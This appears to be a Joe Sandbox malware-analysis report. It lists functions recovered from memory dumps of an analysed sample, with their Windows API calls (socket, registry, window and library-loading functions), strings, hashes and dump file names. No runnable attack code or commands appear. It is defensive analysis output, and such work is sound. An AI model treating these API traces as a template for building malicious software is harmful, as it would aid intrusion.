_memcmp.LIBCMT ref: 00C4C5D2
_memcmp.LIBCMT ref: 00C4C5ED

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 446f4535e3700edf46536333a8210beabe70d3f12c6da612eab272c8174c15fd
Instruction ID: d66b6df78b876a9202d84536bd121e0492e8e3ad2885f2af1d8efc91a2141762
Opcode Fuzzy Hash: 446f4535e3700edf46536333a8210beabe70d3f12c6da612eab272c8174c15fd
Instruction Fuzzy Hash: BE21F2A1A072057B924076158DC2FFF771DBE41B88B044026FE06A6252EB54FF11B2A9

Function 014ED365 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 014ED3EB

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a971cdcd53c9ee205c9c0adb9481af7acba1b2869514519882e4917ea65f7e54
Instruction ID: 4f87e621f2db673e25a7148ba05ce17e6c5985e8d659fb59d8cdd8f98c59265c
Opcode Fuzzy Hash: a971cdcd53c9ee205c9c0adb9481af7acba1b2869514519882e4917ea65f7e54
Instruction Fuzzy Hash: 4CB13872D002569FDB128FA8CC84BAF7FE5EF65311F14416BE908AB392D3749901CBA0

Function 014C0700 Relevance: 10.6, APIs: 7, Instructions: 135COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014C074C
std::_Lockit::_Lockit.LIBCPMT ref: 014C076E
std::_Lockit::~_Lockit.LIBCPMT ref: 014C078E
__Getctype.LIBCPMT ref: 014C0827
__Getcvt.LIBCPMT ref: 014C083D
std::_Facet_Register.LIBCPMT ref: 014C0874
std::_Lockit::~_Lockit.LIBCPMT ref: 014C088C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
String ID:
API String ID: 2755674607-0
Opcode ID: c0151cf32faa9e0299b470157a52e9c3c0a4e0a0d31e4530d4a478e918108480
Instruction ID: dbf32b7a5408712e2638f7829ba7892fd93e23f9889bc43f5edc5225f4b797ad
Opcode Fuzzy Hash: c0151cf32faa9e0299b470157a52e9c3c0a4e0a0d31e4530d4a478e918108480
Instruction Fuzzy Hash: 1751DF79D00709CFDB25DF58C540AAAB7B4FF24B10F15826EE845AB361EB30BA45CB91

Function 014DC200 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 014DC237
___except_validate_context_record.LIBVCRUNTIME ref: 014DC23F
_ValidateLocalCookies.LIBCMT ref: 014DC2C8
__IsNonwritableInCurrentImage.LIBCMT ref: 014DC2F3
_ValidateLocalCookies.LIBCMT ref: 014DC348

Strings

csm, xrefs: 014DC2DD

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b7285282acb27028f99682685a06eda0b4618241178b2c890018230f34236594
Instruction ID: 1729c9e57a15495f4e630c7702c173cf67a0292a6f0213e68e99ef537c9d983d
Opcode Fuzzy Hash: b7285282acb27028f99682685a06eda0b4618241178b2c890018230f34236594
Instruction Fuzzy Hash: E441A334E002199FCF10DFA9C894A9EBBF5BF59314F14805EE9189B3A5D731AA05CB90

Function 00C766BA Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00C766D9
GetWindowLongW.USER32(?,000000F0), ref: 00C7670C
GetWindowLongW.USER32(?,000000F0), ref: 00C76741
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00C76773
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00C7679D
GetWindowLongW.USER32(?,000000F0), ref: 00C767AE
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C767C8

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a3b489b4d348f9a9d29961aba2a8c9494d9f79e1b7ebc7950862c6ee82864489
Instruction ID: 58ec72d69dab15a105ebddea2cbdb9902c6bbdf8e09f7310e00d8499ae37dc99
Opcode Fuzzy Hash: a3b489b4d348f9a9d29961aba2a8c9494d9f79e1b7ebc7950862c6ee82864489
Instruction Fuzzy Hash: 7B3158352005109FDB24CF18DC84F593BE5FB89798F2981A4FA288F2B2CB72AD54DB50

Function 00C4E06A Relevance: 10.6, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E0AD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E0D3
#2.WSOCK32(00000000), ref: 00C4E0D6
#2.WSOCK32(?), ref: 00C4E0F4
#6.OLEAUT32(?), ref: 00C4E0FD
StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E122
#2.WSOCK32(?), ref: 00C4E130

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharMultiWide$FromString
String ID:
API String ID: 1211328463-0
Opcode ID: 2b192be69a99c517eb5d098ae4f47b5d97c64216d3741a6f03e6bc712fca9792
Instruction ID: 393efb693f2d23b383b838b243263fd50635d1ab8e0957e8b743ec3955adbab1
Opcode Fuzzy Hash: 2b192be69a99c517eb5d098ae4f47b5d97c64216d3741a6f03e6bc712fca9792
Instruction Fuzzy Hash: 5421B232600219AFAB50DFA8CC88EBF73ACFF09360F158125FA15DB291D6709D859B64

Function 00C66623 Relevance: 10.6, APIs: 7, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00C6823D: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C68268

#23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00C66676
#111.WSOCK32(00000000), ref: 00C66685
#12.WSOCK32(00000000,8004667E,00000000), ref: 00C666BE
#4.WSOCK32(00000000,?,00000010), ref: 00C666C7
#111.WSOCK32 ref: 00C666D1
#3.WSOCK32(00000000), ref: 00C666FA
#12.WSOCK32(00000000,8004667E,00000000), ref: 00C66713

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: #111
String ID:
API String ID: 568940515-0
Opcode ID: 46a221bcf9a34776a8d1b726a027321ce960e7e23fbe156c681a9a5650b6b98b
Instruction ID: 7aa311e6bfc3eb4b3c0197c1fe519b2af3bbf196336c4ba03a3cc0e025c41e62
Opcode Fuzzy Hash: 46a221bcf9a34776a8d1b726a027321ce960e7e23fbe156c681a9a5650b6b98b
Instruction Fuzzy Hash: A131D471600208AFDB209F64DCC5BBE77EDEB44764F104169FE15972D1DB70AD488BA1

Function 00C4E143 Relevance: 10.6, APIs: 7, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E188
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C4E1AE
#2.WSOCK32(00000000), ref: 00C4E1B1
#2.WSOCK32 ref: 00C4E1D2
#6.OLEAUT32 ref: 00C4E1DB
StringFromGUID2.OLE32(?,?,00000028), ref: 00C4E1F5
#2.WSOCK32(?), ref: 00C4E203

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ByteCharMultiWide$FromString
String ID:
API String ID: 1211328463-0
Opcode ID: 8722b33bfa3d33bae4bcb8b9f2685df0e294ed4457f93cf168c24a1964ed5fac
Instruction ID: 5ee362cf0cccf26eba38b05c319d6efde04085497fe180213b499b6e3d80f628
Opcode Fuzzy Hash: 8722b33bfa3d33bae4bcb8b9f2685df0e294ed4457f93cf168c24a1964ed5fac
Instruction Fuzzy Hash: F521A731644108AFDB609FA8DC88EBE77ECFF49360B118125FA15CB2A1D670DD819B64

Function 014EC449 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,014EC558,01401AF7,?,00000000,?,?,?,014EC7C2,00000022,FlsSetValue,0150A0E4,0150A0EC,?), ref: 014EC50A

Strings

ext-ms-, xrefs: 014EC4B4
api-ms-, xrefs: 014EC4A0

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 5ba0c7192fc642904a2bdb8bd5f925094b85f25b92d90dcfb6828859641ebbb2
Instruction ID: fe206b66b65ddbbd2e07290bcd1563cbbb45abf32fc360a11e6676e35ec574eb
Opcode Fuzzy Hash: 5ba0c7192fc642904a2bdb8bd5f925094b85f25b92d90dcfb6828859641ebbb2
Instruction Fuzzy Hash: 9E213D32A00255ABDB339F69DC8CA7B37E8EB41775F150126E926AB395E730E904C7D0

Function 014CE618 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 014CE61F
__Getcvt.LIBCPMT ref: 014CE62D
_Getvals.LIBCPMT ref: 014CE671
_Mpunct.LIBCPMT ref: 014CE6AC
_Mpunct.LIBCPMT ref: 014CE6C6

Strings

$+xv, xrefs: 014CE6D1

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Mpunct$GetcvtGetvalsH_prolog3
String ID: $+xv
API String ID: 2737107202-1686923651
Opcode ID: 47bd2a7c025d3b42a41016004653e82da80b11f6617e633a1f0565bbb0c83614
Instruction ID: 9e71abf4a6d246f190594c00d80e6f3caf01bb52864c8bb834cdfa822b4793a9
Opcode Fuzzy Hash: 47bd2a7c025d3b42a41016004653e82da80b11f6617e633a1f0565bbb0c83614
Instruction Fuzzy Hash: E021B0B5904B42AEDB61DF75889063BBEF8AB28601F04091FE599C7A51D734E602CB90

Function 00C140E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C141B2,?), ref: 00C14103
GetProcAddress.KERNEL32(00000000), ref: 00C1410A
EncodePointer.KERNEL32(00000000), ref: 00C14116
DecodePointer.KERNEL32(00000001,00C141B2,?), ref: 00C14133

Strings

combase.dll, xrefs: 00C140FE
RoInitialize, xrefs: 00C140F2

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: a3210ae7c0429deb5dca95c7474c5c974be9fc9179ec53e4e1deb694822dd99b
Instruction ID: 11d6add9973a2834d7aae1456dc4ee183749f24522be10e5bb64daff504002c6
Opcode Fuzzy Hash: a3210ae7c0429deb5dca95c7474c5c974be9fc9179ec53e4e1deb694822dd99b
Instruction Fuzzy Hash: A2E01AB1A90350AFDF942FB8EC4DB4C3664BB26F06F604524F421D50B0DBB545D89F08

Function 00C141BE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C140D8), ref: 00C141D8
GetProcAddress.KERNEL32(00000000), ref: 00C141DF
EncodePointer.KERNEL32(00000000), ref: 00C141EA
DecodePointer.KERNEL32(00C140D8), ref: 00C14205

Strings

combase.dll, xrefs: 00C141D3
RoUninitialize, xrefs: 00C141C7

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 6e39737b74fa9633de4bd25d36034d0f8fb01a5f5cc09caff2e914142ac9a157
Instruction ID: f83397b1104ce7ff0a59dd72357c782654e6a0c5f8b8a7aec7d3c8324db64011
Opcode Fuzzy Hash: 6e39737b74fa9633de4bd25d36034d0f8fb01a5f5cc09caff2e914142ac9a157
Instruction Fuzzy Hash: 95E0EC79995310AFDB989F64FD0DF4C3AA8BB21B06F204229F011E21B1CBB446C8DB18

Function 014E530E Relevance: 9.3, APIs: 6, Instructions: 271COMMON

Download Yara Rule

APIs

Part of subcall function 014E51E4: CloseHandle.KERNEL32(?,?,?,014E531B,?,?,0143D6A9,00000000), ref: 014E5215
Part of subcall function 014E51E4: FreeLibraryAndExitThread.KERNEL32(?,?,?,?,014E531B,?,?,0143D6A9,00000000), ref: 014E522B
Part of subcall function 014E51E4: ExitThread.KERNEL32 ref: 014E5234

__allrem.LIBCMT ref: 014E54A4
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E54C0
__allrem.LIBCMT ref: 014E54D7
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E54F5
__allrem.LIBCMT ref: 014E550C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014E552A

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$ExitThread$CloseFreeHandleLibrary
String ID:
API String ID: 1885649644-0
Opcode ID: 6fea525441ed0e021e1b8f95325e267f9a1fa0c9dde304b0edb62d3332323cc5
Instruction ID: f035e8e721dd080a6ecc91f22abd9958b31cd110d9d68b4f470ec7025546fcca
Opcode Fuzzy Hash: 6fea525441ed0e021e1b8f95325e267f9a1fa0c9dde304b0edb62d3332323cc5
Instruction Fuzzy Hash: B68104B5A00706AFE7249E2ECC48B6B77E9AF6422AF14452FE111DF7A0EBB0D5018750

Function 00BF218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00BF21B8
GetWindowRect.USER32(?,?), ref: 00BF21F9
ScreenToClient.USER32(?,?), ref: 00BF2221
GetClientRect.USER32(?,?), ref: 00BF2350
GetWindowRect.USER32(?,?), ref: 00BF2369

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 7e5b113a054ec048522f1b609beca7e37e704bf85443bf7f3acf540a8d4b0968
Instruction ID: 695c1d6c42d2f1d42a01e572d61af42df8f9fd488cb4c21a569154bad8359d3d
Opcode Fuzzy Hash: 7e5b113a054ec048522f1b609beca7e37e704bf85443bf7f3acf540a8d4b0968
Instruction Fuzzy Hash: C4B1497990024ADBDF10CFA8C5807EEB7B1FF08310F148169EE59AB654EB34AA54CB64

Function 01429380 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 488COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0142965A
___std_exception_destroy.LIBVCRUNTIME ref: 01429673
___std_exception_destroy.LIBVCRUNTIME ref: 014298D5
___std_exception_destroy.LIBVCRUNTIME ref: 014298EE

Strings

value, xrefs: 0142955D, 014297C9

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 9008c3e85f2859f3142ae87dd7a70045b809f36809fcb9b31878c18b0c59cd59
Instruction ID: bc178b97521bc06a6e5938776f8304ff3367cd21a89079601feb573c32839033
Opcode Fuzzy Hash: 9008c3e85f2859f3142ae87dd7a70045b809f36809fcb9b31878c18b0c59cd59
Instruction Fuzzy Hash: EC12CC709002699BEB25CB28CC84BEDBBB5AF65304F1482DED448A73A1DB705AC8CF51

Function 00C568E0 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C56A33
_memmove.LIBCMT ref: 00C5696E

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

_memmove.LIBCMT ref: 00C569E1
_memmove.LIBCMT ref: 00C56AC8
_memmove.LIBCMT ref: 00C56AE1
_memmove.LIBCMT ref: 00C56AFD

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: f9ebc7ad9552b9973124508a2c6bc1839b856f3ee9bb6e9ef79a1cee5db50f54
Instruction ID: 275abb9f3dbd3ad0c0a7c5d01390d3d234a39bd1a04010c7dbb919c5b190c5e9
Opcode Fuzzy Hash: f9ebc7ad9552b9973124508a2c6bc1839b856f3ee9bb6e9ef79a1cee5db50f54
Instruction Fuzzy Hash: 7161013450024E9BCF11EF60CC82EFE37A4AF05308F448559FD596B292DB30AD9AEB54

Function 00C7060C Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C706E5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70725
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C70748
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C70771
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C707B4
RegCloseKey.ADVAPI32(00000000), ref: 00C707C1

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: b9a67357c1d099442220db7a17f1d692c64024fa5f1418c231ee868acadb0369
Instruction ID: ad0a973959ae63f37910a1e39068dbcbec6579af17ff3700f9cbd62bb4ef7f0a
Opcode Fuzzy Hash: b9a67357c1d099442220db7a17f1d692c64024fa5f1418c231ee868acadb0369
Instruction Fuzzy Hash: 28518D31208204EFD714EB64C885E6FB7E8FF85314F14891DF999872A1DB31E905DB92

Function 00C5281D Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C5286B
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C528B6
IsMenu.USER32(00000000), ref: 00C528D6
CreatePopupMenu.USER32 ref: 00C5290A
GetMenuItemCount.USER32(000000FF), ref: 00C52968
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C52999

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 912c6b1ca7eebeb23b0231c86896bff1d0839a1f9c16de871d7f9000c8e98322
Instruction ID: c0682b2d7fc9687729aea6fb2156eba33e2526567077e09b45a690b089ddf662
Opcode Fuzzy Hash: 912c6b1ca7eebeb23b0231c86896bff1d0839a1f9c16de871d7f9000c8e98322
Instruction Fuzzy Hash: 2151B07860420AEBDF24CF68C888BADBBF4FF46315F144559EC6197391D3709A88CB69

Function 014C371E Relevance: 9.1, APIs: 6, Instructions: 111COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 014C37B7
std::_Lockit::_Lockit.LIBCPMT ref: 014C37C1
codecvt.LIBCPMT ref: 014C37FB

Part of subcall function 014C3F5E: __EH_prolog3.LIBCMT ref: 014C3F65

std::_Facet_Register.LIBCPMT ref: 014C3812
